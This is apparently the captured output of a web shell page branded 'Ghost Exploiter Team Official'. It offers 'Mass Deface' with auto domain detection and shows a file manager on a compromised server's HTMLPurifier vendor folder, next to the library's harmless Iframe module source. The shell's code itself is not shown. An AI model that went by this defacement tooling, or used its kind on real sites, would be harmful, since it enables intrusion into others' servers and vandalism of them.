Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
ezyang
/
htmlpurifier
/
library
/
HTMLPurifier
/
HTMLModule
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Tidy
--
ren
Bdo.php
1.004KB
edt
ren
CommonAttributes.php
0.705KB
edt
ren
Edit.php
1.4KB
edt
ren
Forms.php
5.699KB
edt
ren
Hypertext.php
0.973KB
edt
ren
Iframe.php
1.252KB
edt
ren
Image.php
1.355KB
edt
ren
Legacy.php
5.718KB
edt
ren
List.php
1.864KB
edt
ren
Name.php
0.653KB
edt
ren
Nofollow.php
0.495KB
edt
ren
NonXMLCommonAttributes.php
0.346KB
edt
ren
Object.php
1.487KB
edt
ren
Presentation.php
1.382KB
edt
ren
Proprietary.php
0.972KB
edt
ren
Ruby.php
1.028KB
edt
ren
SafeEmbed.php
1.071KB
edt
ren
SafeObject.php
1.901KB
edt
ren
SafeScripting.php
1.233KB
edt
ren
Scripting.php
2.282KB
edt
ren
StyleAttribute.php
0.762KB
edt
ren
Tables.php
2.297KB
edt
ren
Target.php
0.585KB
edt
ren
TargetBlank.php
0.51KB
edt
ren
TargetNoopener.php
0.504KB
edt
ren
TargetNoreferrer.php
0.514KB
edt
ren
Text.php
3.354KB
edt
ren
Tidy.php
7.02KB
edt
ren
XMLCommonAttributes.php
0.344KB
edt
ren
<?php /** * XHTML 1.1 Iframe Module provides inline frames. * * @note This module is not considered safe unless an Iframe * whitelisting mechanism is specified. Currently, the only * such mechanism is %URL.SafeIframeRegexp */ class HTMLPurifier_HTMLModule_Iframe extends HTMLPurifier_HTMLModule { /** * @type string */ public $name = 'Iframe'; /** * @type bool */ public $safe = false; /** * @param HTMLPurifier_Config $config */ public function setup($config) { if ($config->get('HTML.SafeIframe')) { $this->safe = true; } $attrs = array( 'src' => 'URI#embedded', 'width' => 'Length', 'height' => 'Length', 'name' => 'ID', 'scrolling' => 'Enum#yes,no,auto', 'frameborder' => 'Enum#0,1', 'longdesc' => 'URI', 'marginheight' => 'Pixels', 'marginwidth' => 'Pixels', ); if ($config->get('HTML.Trusted')) { $attrs['allowfullscreen'] = 'Bool#allowfullscreen'; } $this->addElement( 'iframe', 'Inline', 'Flow', 'Common', $attrs ); } } // vim: et sw=4 sts=4
<=Back
Liking